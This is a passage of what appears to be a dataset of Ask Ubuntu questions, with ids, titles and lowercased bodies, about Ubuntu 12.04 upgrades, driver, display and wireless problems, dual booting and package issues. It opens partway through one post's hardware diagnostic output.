i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.5 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 6 ( rev 03 ) ( prog-if 00 [ normal decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) ( prog-if 00 [ uhci ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem- busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) ( prog-if 20 [ ehci ] ) subsystem : hewlett-packard company device 3072 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) ( prog-if 01 [ subtractive decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- tabort- reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) subsystem : hewlett-packard company device 3072 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- serr- kernel modules : itco_wdt 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : hewlett-packard company device 3072 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- serr- kernel driver in use : ahci 02:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) subsystem : hewlett-packard company device 1508 physical slot : 1 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel modules : ssb 85:00.0 ethernet controller : marvell technology group ltd. 88e8072 pci-e gigabit ethernet controller ( rev 10 ) subsystem : hewlett-packard company device 3072 physical slot : 5 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- kernel driver in use : sky2 kernel modules : sky2 lsmod module size used by rfcomm 38139 0 bnep 17830 2 bluetooth 158438 10 rfcomm , bnep parport_pc 32114 0 ppdev 12849 0 binfmt_misc 17292 1 snd_hda_codec_hdmi 31775 1 snd_hda_codec_analog 75395 1 hp_wmi 13652 0 sparse_keymap 13658 1 hp_wmi ip6t_log 16846 4 xt_hl 12465 6 ip6t_rt 12473 3 nf_conntrack_ipv6 13581 7 nf_defrag_ipv6 13139 1 nf_conntrack_ipv6 ipt_reject 12512 1 ipt_log 12783 5 joydev 17393 0 xt_limit 12541 12 xt_tcpudp 12531 22 xt_addrtype 12596 4 xt_state 12514 14 snd_hda_intel 32765 3 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_analog , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec uvcvideo 67203 0 ip6table_filter 12711 1 videodev 86588 1 uvcvideo ip6_tables 22528 3 ip6t_log , ip6t_rt , ip6table_filter nf_conntrack_netbios_ns 12585 0 nf_conntrack_broadcast 12541 1 nf_conntrack_netbios_ns nf_nat_ftp 12595 0 nf_nat 24959 1 nf_nat_ftp nf_conntrack_ipv4 19084 9 nf_nat nf_defrag_ipv4 12649 1 nf_conntrack_ipv4 snd_seq_midi 13132 0 nf_conntrack_ftp 13183 1 nf_nat_ftp nf_conntrack 73847 8 nf_conntrack_ipv6 , xt_state , nf_conntrack_netbios_ns , nf_conntrack_broadcast , nf_nat_ftp , nf_nat , nf_conntrack_ipv4 , nf_conntrack_ftp iptable_filter 12706 1 snd_rawmidi 25424 1 snd_seq_midi ip_tables 18106 1 iptable_filter x_tables 21974 13 ip6t_log , xt_hl , ip6t_rt , ipt_reject , ipt_log , xt_limit , xt_tcpudp , xt_addrtype , xt_state , ip6table_filter , ip6_tables , iptable_filter , ip_tables snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event snd_timer 28931 2 snd_pcm , snd_seq psmouse 72846 0 snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq serio_raw 13027 0 snd 62064 16 snd_hda_codec_hdmi , snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm hp_accel 25728 0 lis3lv02d 19268 1 hp_accel input_polldev 13648 1 lis3lv02d i915 414603 3 drm_kms_helper 45466 1 i915 drm 197692 4 i915 , drm_kms_helper wmi 18744 1 hp_wmi mac_hid 13077 0 i2c_algo_bit 13199 1 i915 video 19068 1 i915 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41906 0 hid 77367 1 usbhid sky2 53628 0 ifconfig -a eth1 link encap : ethernet hwaddr 18 : a9:05 : cb:4d:21 inet addr:192.168.0.14 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :1aa9:5ff : fecb:4d21/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6353 errors:0 dropped:0 overruns:0 frame:0 tx packets:6371 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5005147 ( 5.0 mb ) tx bytes:971681 ( 971.6 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1092 errors:0 dropped:0 overruns:0 frame:0 tx packets:1092 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:146272 ( 146.2 kb ) tx bytes:146272 ( 146.2 kb ) iwconfig lo no wireless extensions . eth1 no wireless extensions .
125572	how do you invoke the hud ?	i 've just upgraded to ubuntu 12.04 and would like to try out the new heads-up display ( hud ) interface . how do i make it show up ?
125574	how can i install apps previously installed on a different installation on my new installation ?	on my new 12.04 installation i want to install apps that reside on my 11.10 installation without having to download them again.is that possible ?
125575	edges of screen cut off in ubuntu 12.04	i have a visio 19 '' t.v that i am using as a high-def monitor . i am using a pci graphics card ( evga geforce 8400 gs ) . i am using an hdmi cable to transmit the display . i have already checked and updated propriety drivers ( got the nvidia drivers from the propriety driver option in the system settings ) . the problem is : about half a centimeter is cut off of the top and bottom of the screen , a good centimeter is cut off both right and left sides . in addition to it being to `` zoomed in '' the quality of the image is not very good . image does n't look sharp or crisp at all . colors are dull and nothing is overly vibrant , poor picture quality in general . here 's the catch ... this exact t.v monitor and the graphics card worked great on ubuntu 11.10 , but ever since i upgraded to 12.04 the display has been crappy . in display under system settings it shows the display as `` unknown '' and the resolution is set to the maximum ( 1280 x 720 ) . also , i went into my monitor 's settings and ensured that the vertical and horizontal position/sizes were not increased or dis-positioned to create this `` zoomed in '' effect . any help is much appreciated ! thanks , preston .
125583	/dev/vzfs 100 % used - what does this mean exactly ?	filesystem 1k-blocks used available use % mounted on /dev/vzfs 46472 46472 0 100 % / /dev/vzfs 78643200 50452188 28191012 65 % /repair i am in recovery mode because my system crashed ; disk quota error . i have deleted loads of unnecessary directories and now ? is it normal that the use is 100 % on the first line ? what is the first line exactly ?
125589	12.04 beta upgrade to 12.04 stable	a lot of advice has been flying around today about upgrading from beta to 12.04 stable , and most people are simply saying they are the same , however ; in my experience it appears that they are not the same : this is run from my `` beta '' build of 12.04 . $ apt-get upgrade : the following packages have been kept back : linux-generic linux-headers-generic linux-image-generic $ uname -a linux ****** 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following new packages will be installed : linux-headers-3.2.0-24 linux-headers-3.2.0-24-generic linux-image-3.2.0-24-generic the following packages will be upgraded : linux-generic linux-headers-generic linux-image-generic 3 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 50.5 mb of archives . after this operation , 216 mb of additional disk space will be used . do you want to continue [ y/n ] ? n abort . are we sure it 's the same ? it really appears as though release has a new build of kernel ( -24- ) that beta ca n't install without upgrading
125593	how can i get the browser to render font exactly like windows 7 ?	i do n't like the small fonts in the browser . however , increasing the size causes trouble ; the last word in a sentence will start a new line . this is really ugly . i want the exact same font rendering in the browser as in windows 7 ( pixel for pixel ) because web pages are made for it . it is the right size and has the right number of pixels between letters and so on ( yes , i am picky ) . if possible , anyone know how to do this ?
125600	update 11.04 to 12.04 with livecd	i 'm trying to update my current ubuntu 11.04 install to 12.04 while keeping the files , settings and installed applications but without having to go through updating to ubuntu 11.10 as an intermediate step , that is , without using ubuntu update manager . i 've read on the internet that the livecd ( and possibly liveusb too ) installer offers an option to upgrade a version older than 11.10 in the installer . however , it is not available to me . more specifically , i 'm looking for the second option in this screenshot : http : //4.bp.blogspot.com/_1qsdkzyy2vc/twzh8z786xi/aaaaaaaadnw/8lxqgcmgicy/s2000/ubuntu11.04-installer.png ... but with the version numbers changed to 12.04 ( i swear i 've seen a screenshot of the 12.04 beta version installer with that option , but ca n't find it now ) . has it been removed from the 12.04 lts installer ? or should i be using the alternate cd ? it 's very important to me not to have to go through two ubuntu versions as my internet connection is slow and downloading 11.10 first would be a waste of bandwidth as well as time ( both for downloading and installation ) . thanks
125607	ralink rt2790 ( or maybe a rt2860 ) , detected as two different chipsets , ca n't connect	today , i have installed 12.04 & my wifi stopped working . wireless gets detected as rt2790 & show available network but does n't not connect to any wireless network ( tried secured & unsecured ) for some strange reason . here are my debug logs : $ lspci -vv 01:00.0 network controller : ralink corp. rt2790 wireless 802.11n 1t/2r pcie subsystem : asustek computer inc. device 130f control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 4 bytes interrupt : pin a routed to irq 16 region 0 : memory at fd9f0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci kernel modules : rt2800pci $ dmesg [ 10.376745 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 10.377050 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 10.382818 ] r8169 0000:02:00.0 : eth0 : link down [ 10.382999 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 10.383320 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 10.399893 ] type=1400 audit ( 1335469914.161:10 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=770 comm= '' apparmor_parser '' [ 10.466654 ] type=1400 audit ( 1335469914.229:11 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=777 comm= '' apparmor_parser '' [ 10.467258 ] type=1400 audit ( 1335469914.229:12 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/telepathy/telepathy-* '' pid=777 comm= '' apparmor_parser '' [ 10.471790 ] type=1400 audit ( 1335469914.233:13 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/cups/backend/cups-pdf '' pid=778 comm= '' apparmor_parser '' [ 10.472486 ] type=1400 audit ( 1335469914.237:14 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/cupsd '' pid=778 comm= '' apparmor_parser '' [ 10.813041 ] init : alsa-restore main process ( 814 ) terminated with status 99 [ 36.626240 ] audit_printk_skb : 27 callbacks suppressed [ 36.626245 ] type=1400 audit ( 1335469940.389:24 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /usr/share/gvfs/remote-volume-monitors/ '' pid=1594 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 [ 68.040170 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 1 ) [ 68.041544 ] wlan0 : authenticated [ 68.056069 ] wlan0 : associate with 00:14:78:19:8f : da ( try 1 ) [ 68.057737 ] wlan0 : deauthenticated from 00:14:78:19:8f : da ( reason : 6 ) [ 197.784490 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 207.812147 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 1 ) [ 207.813561 ] wlan0 : authenticated [ 207.828142 ] wlan0 : associate with 00:14:78:19:8f : da ( try 1 ) [ 207.829666 ] wlan0 : deauthenticated from 00:14:78:19:8f : da ( reason : 6 ) [ 271.148245 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 1 ) [ 271.149599 ] wlan0 : authenticated [ 271.149779 ] wlan0 : failed to insert dummy sta entry for the ap ( error -17 ) [ 334.140512 ] wlan0 : deauthenticating from 00:14:78:19:8f : da by local choice ( reason=2 ) [ 334.148263 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 1 ) [ 334.149624 ] wlan0 : authenticated [ 334.149843 ] wlan0 : failed to insert dummy sta entry for the ap ( error -17 ) [ 397.136541 ] wlan0 : deauthenticating from 00:14:78:19:8f : da by local choice ( reason=2 ) [ 399.272147 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 1 ) [ 399.472028 ] wlan0 : authenticate with 00:14:78:19:8f : da ( try 2 ) [ 399.473423 ] wlan0 : authenticated [ 399.473654 ] wlan0 : failed to insert dummy sta entry for the ap ( error -17 ) $ iwconfig wlan0 wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off now , i am also running ubuntu 10.10 on this same machine , in that my wireless gets detected as ralink rt2860 chipset & works perfectly ) . i can connect to internet . here is the lspci output from ubuntu 10.10 01:00.0 network controller : ralink rt2860 subsystem : asustek computer inc. device 130f control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 4 bytes interrupt : pin a routed to irq 16 region 0 : memory at fd9f0000 ( 32-bit , non-prefetchable ) [ size=64k ] capabilities : < access denied > kernel driver in use : rt2800pci kernel modules : rt2860sta , rt2800pci interesting thing to notice here is : the same card gets detected as two different chipsets ( rt2790 vs rt2860 ) the wireless card in question here is : asus pce-n10 wireless pci express adapter . and i think chipset in this card is rt2860 ( not rt2790 ) , correct me if i am wrong . i further suspect this wrong detection in ubuntu 12.04 is the reason that it does n't connect/work . so , please let me know if my suspicion is correct ? if yes , then what i need to do to fix this mess & get my wireless card working in ubuntu 12.04 ?
125608	unity 3d no longer works after installing 12.04	i just installed ubuntu 12.04 by cd . unity 3d will not work now only 2d it worked fine in 11.10 and also when i upgraded to the beta of 12.04 through update manager . i tried both nvidia proprietary drivers on the list with no luck . i had many more driver choices in 11.10 and 12.04 beta but the default installed driver always worked before this install . i get a black screen and the wall paper sometimes shows for a few seconds and then goes back to the black screen using unity 3d .
125609	netbeans all menu fonts are bold after upgrade to 12.04	after updating ubuntu to 12.04 all fonts got bold . i have n't installed themes or configured fonts . from netbeans about : product version : netbeans ide 7.1 ( build 201112071828 ) java : 1.7.0_03 ; java hotspot ( tm ) 64-bit server vm 22.1-b02
125612	update manager does n't offer an upgrade to the new release	so i have ubuntu installed on my pc , and i want to upgrade to the new ubuntu which was just released . when i check for any new updates it does n't show any upgrades to the new release . how can i fix this ? thanks !
125617	easiest way to accomplish dual boot goal	here 's the situation : i 've got a 64 bit dell inspiron 15 that currently dual boots ubuntu 11.10 , and backtrack 5r2 . i 've backed up all the data i need on both of these operating systems , and heres what i want : dual booting ubuntu 12.04 and windows 7 ( sometime before next month so i can run diablo 3 ) . i can make any changes to the system neccesary . if i do a clean install of 12.04 and then install windows wont windows overwrite grub and make my ubuntu partition unreachable ? my friend told me i ca n't do windows first because `` theres no such thing as a clean install for windows '' .
125624	dell inspiron 1525 , upgraded to 12.04 and have lost wireless internet connection	i 've just upgraded my dell inspiron 1525 to 12.04 . wireless connection worked before , but now it does n't . i ca n't seem to start the driver . i remember having to activate it manually for the last version and it worked fine but it does n't with this new 12.04 upgrade . when i go to `` additional drivers '' , i am shown one option named `` broadcom sta wireless driver '' . when i try to activate it , i get this message : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log the message entered into the log is : 2012-04-26 22:17:36,194 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted 2012-04-26 22:17:36,491 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-04-26 22:17:36,492 warning : /sys/module/wl/drivers does not exist , can not rebind wl driver 2012-04-26 22:17:36,556 debug : broadcomwlhandler enabled ( ) : kmod disabled , bcm43xx : blacklisted , b43 : blacklisted , b43legacy : blacklisted can anyone help please ?
125640	how to install/configure/use juju in non aws clouds ?	i think that juju is a technology that has the potential to help a lot of sysadmins , it would be great to have a good tutorial for using it in other clouds , such as gandi.net1 . is there any way to run juju in non aws2 clouds ?
125641	12.04 upgrade from 11.10 failed , can not finish upgrade	after running the upgrade from 11.10 to 12.04 , the upgrade manager crashed during the installation portion . now , when i run the update manager , it tells me : not all updates can be installed . run a partial upgrade , to install as many updates as possible . however , when i click `` partial upgrade , '' i get this error : failed to run /usr/bin/update-manager ' -- dist-upgrade ' as user root . unable to copy the user 's xauthorization file . how can i get my upgrade to finish ? i have tried several suggestions i 've found on the internet , including sudo dpkg -- configure -a , but always get errors .
125642	battery power indicator bug and high power consumption on 12.04	i have a samsung np530u3b-a01 : - intel core i5 2467m - 4gb ram - intel hd 3000 - 500gb hard drive it 's dual boot with windows 7 . i 've seen if i unplug the baterry charger , the battery indicator remains as if is still charging and the oposite happens to . and the power comsunption is huge . in windows 7 i got comsuptions around 7w in idle . in ubuntu 12.04 is around 18w in idle . i really like ubuntu but with this power consumption i can only got 1h of battery and i dont want to use an os that ca n't give me a nice battery life : (
125644	how do i install w32codecs by hand ?	have searched the internet but the guy does not explain in detail so i decided to post my question here i hope someone can help me . note : package i am trying to install is the w32codecs , i await the answer .
125645	apt-get packages `` kept back ''	does anyone know how to fix this ? i would really like to be able to update my install again . by the way i ran the sudo apt-get update & & sudo apt-get upgrade command
125648	no launcher icon size option in ubuntu 12.04	this is really weird but i really do n't have the option to resize my launcher icons in the system settings - > appearance menu as i should ... actually i enter unity ( 3d ) but the launcher panel seems like the one from unity 2d ...
125649	reboot during update , glibc error : libc.so.6 : version 'glibc_2.14 ' not found	while upgrading from 11.10 to 12.04 the upgrade stalled because it said xscreensaver needed to be uninstalled . i tried to open a terminal but the system would n't respond . so i did a hard boot and now i ca n't get past the ubuntu loading screen . when i got to the root screen i get a message : mountall : /lib/x86_64-linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by /lib/libpllibply.so.2 i do n't really know what to do from this point on .
125656	store emails in cifs mounted filesystem for a postfix maildir mailbox type	i have a cifs mounted filesystem and i will like to know , does sudo postconf -e 'home_mailbox = maildir/ ' mean that maildir is chosen as default mailbox format or it just specifies a directory where an email is meant to be stored ?
125657	graphics experience ?	hi there . i have a question about a option in system preferences . if i go in details and select graphics , i can find tis 2 options : driver ( mine is gtx470/etc ... ) experience ( mine is standard ) my question is , if there are other types of graphics experiences ? if yes , what types , and how i change it ? if no , what is the utility of this thing ? thanks . : d
125660	accidentaly hit esc during a do-release-upgrade ?	while doing a do-release-upgrade ( from 11.10 to 12.04 ) , i accidentally hit esc and noticed that this interrupted the download of the file being donwloaded at the time and then skipping to the next file . one of those files is coreutils , the other is lbssl1.0.0 . will do-release-upgrade or apt-get reattempt a download of those files before attempting the upgrade ? i presume the install script and software is robust enough to note the dependencies and to reattempt download of those files ? the process is still ongoing as i type this .
125662	how to reset gnome panel ?	i think my gnome-panel is messed up because i alt+right click it and nothing pops up . i 'm on 12.04 , classic gnome desktop . so i used locate and found gnome-panel in .gconf somewhere , how do i clear just gnome-panel 's settings so that i can add things to my panel again ? edit : matt : ~/.gconf $ find|grep -iw panel ./desktop/ibus/panel ./desktop/ibus/panel/ % gconf.xml ./apps/gnome-settings/gnome-panel ./apps/gnome-settings/gnome-panel/ % gconf.xml
125665	partitions ; ubuntu , kubuntu , windows , you name it , how do i do it ?	alright here 's what i 'm looking for help with . i want to partition my external gofelx drive so that i can install 4 os 's on it . ubuntu , kubuntu , windows seven/8 and another linux distro i know i will eventually pick to put on it . i have had experience with dual booting os 's since currently i have a linux distro installed on the drive and experience somewhat with gparted live since i once had to use it to fix a problem with the drive . it 's a 500 gig drive and i was thinking of making the partitions 40 gigs each for the linux and 50 for the windows , leaving me with the rest of the drive as storage room for files and backups and whatnot . put short i just need some help making sure i 'm doing this right to make sure i do n't screw up . from what i know , what i want to do is start up gparted live and use it to format and partition the drive in 5 partitions , the 3 40 gig partitions , the 1 50 gig and the rest for storage . gparted lists file sizes as mib , not mb , no problem we have calculators for a reason . so i want 3 37.253 gib partitions , 1 46.566 partition and rest as free space . then it comes to installing the os 's , which is where i get a bit wary about things . so i know there are multiple ways of installing os 's to a drive or a partition on a drive , just want to make sure i do n't screw things up . so do i say take wubi , and install the ubuntu and kubuntu distros to the designated partitions with it , or should i burn them to disc , which i would prefer not to do since , well physical media costs money . or should i try something like yumi to install them to the partitions . i also have heard you can use virtual box to install os 's to drives/partitions . i also have image mounting software i was wondering if i could use that somehow to install to the partitions from within windows . and then comes the worst part , install windows 7/8 . if i can just use yumi , would i use it for that as well or what , here 's where i really go off the ropes , since i may be native to windows , but understand more about how to operate with linux .
125666	installed ubuntu upgrade 12.04 and usb external speakers wo n't work .	internal speakers and head set work fine . i am using acer aspire 7560-sb416
125672	can ubuntu 12.04lts fit on a normal cd , 700mb , or i do need a dvd ?	i just want to know if the new ubuntu ( 12.04lts ) can fit perfectly on a normal cd : )
125673	interpreting lshw output - can i get sata iii speeds ?	i know sudo lshw is used to list hardware . what would i look for in the output of this command to tell whether i can use a sata iii hard disk ( versus whether i 'll only achieve sata ii or sata i speeds ) ? is it under *-storage , or something higher up , in the motherboard or something ?
125679	how to install ubuntu on a hard drive with bad blocks ?	i have a problem with my laptop , in which i 'd had windows xp . that xp crashed and i could n't restore it with the install cd . so , i placed ubuntu 11.10 install on a pendrive , searched for some bad blocks ( less than 500 ) , hard drive had a entire format and everything looks fine but the progress bar hangs about 20 % and the install did n't finish over night ? what should i do ?
125684	maximize dialog windows ?	solution : if you 're on standard unity which uses compiz for 3d compositing , use compizconfig-settings-manager . see wearegeek 's answer below . if you 're on unity 2d , as i am , then wmctrl is the only way , per user55822 's answer . apt-get wmctrl gconf-editor , open gconf-editor , navigate to apps \ metacity \ keybinding_commands , bind user55822 's command string to command_1 , then navigate to apps \ metacity \ global_keybindings , and set run_command_1 to the key combination you want to use . details here . some dialog windows are too small and i have to painstakingly drag the corners to make them big enough to be useful ( looking at you chrome/ium bookmark dialog ) . is there any way to maximize these with a shortcut key , mouse is too slow . i found a related discussion but the solution is already implemented in my ubuntu 12.04 installation and does n't have any effect on dialog windows . edit : clarification on the specific window i 'm talking about : in chrome/ium , hit ctrl-d . it will bring up an add bookmark dialog with a `` folder : '' dropdown menu . scroll that menu down , all the way to the last selection `` choose another folder '' . that will close this menu and open a new one , `` edit bookmark '' , which is detached from the browser . that 's the main one i want to maximize but ca n't .
125685	how can i have two launchers , one on the left side of my left screen and on the right side of my right screen ?	with 12.04 and a dual monitor setup , i can choose to have the unity launcher only on the left screen or on the left side of both screens . ideally , i would like to have a launcher on the left side of my left screen and on the right side of my right screen . is this possible in ubuntu 12.04 ?
125686	mysql fails to start ( after upgrade , installation , etc.. )	i 'm a newbie on mysql ground so bear with me . i 've just finished upgrading 11.10 to 12.04 . everything seemed to work without any hiccups and all my software and settings are working fine . apart from mysql . when i try : sudo start mysql i receive an error : start : job failed to start where can i possibly diagnose what the problem is ? and ( hopefully ) - how to sort it out ? ( i disabled automatic start following advice here if that is of some importance ) update 1 : both outputs of : cat /var/log/mysql.err cat /var/log/mysql.log are empty . output of dmesg | grep mysql : [ 1401.785141 ] type=1400 audit ( 1335619832.181:25 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=16165 comm= '' apparmor_parser '' [ 1401.791089 ] init : failed to spawn mysql main process : unable to execute : no such file or directory update 2 : as indicated by awinter below - it seemed that mysql disappeared automagically after upgrade and had to be reinstalled .
125687	does 12.04 need graphics drivers for nvidia ?	i upgraded to kubuntu 12.04 today . i noticed some of my desktop effects were not working , like wobbly windows , and a couple others . so i went into jockey to see if there were nvidia drivers that i needed , but oddly , there were none listed at all . so i went and installed nvidia drivers from their website . now i can not get to a login screen , and when i go to tty [ 1-6 ] and try `` startx '' , i get an odd message stating that i may have to downgrade my x server , and that a glx thing can not be loaded because my x version does not support that . the first time i installed nvidia drivers from the terminal , there were many errors saying that files can not be copied . after that when i tried to reinstall the graphics drivers i got no errors . there are no drivers listed in jockey . my graphics card : geforce fx 5200 ( aka nv34 ) driver version 173 . trying to install nvidia-173 using apt results in an error saying that there are unmet and uninstallable dependencies . my questions are : are these drivers unnecessary because of ubuntu 's move from drm ? did i do the wrong thing ? if so , how do i remove the drivers from my system , or how do i install them correctly ?
125691	title bar with close , minimize , and maximize dialogue options dissapeared after update	running ubuntu 12.04 during installation of a few programs ( gparted and some others ) my computer unexpectedly shut down . when i restarted my machine everything appeared normal . however , every program i open , whether it be terminal or firefox , the title bar is missing . in other words there is no window dialogue other than file , edit , view , etc ... i do n't have the option to close , minimize or maximize . in addition to the absent title bar things do n't seem to load quite right . for example , when i load firefox and go to google.com search results seem to be improperly underlined/not underlined at all . picture quality is not bad ; things just do n't load fully/corrupted looking textures and graphics .
125693	how can i upgrade from 11.04 to 12.04 ?	i am very exited about the releases and i do want to try to install it , but i ca n't see it , when i do launch update manager , there is no update available , the option about notifying me is ticket in the option . but no chance ! any idea why ? plus i can read that a lot of people is having many problems during the upgrade , do you have any idea why ? i did not done any customisation about linux , but a lot of software are installed and i do not want to install again
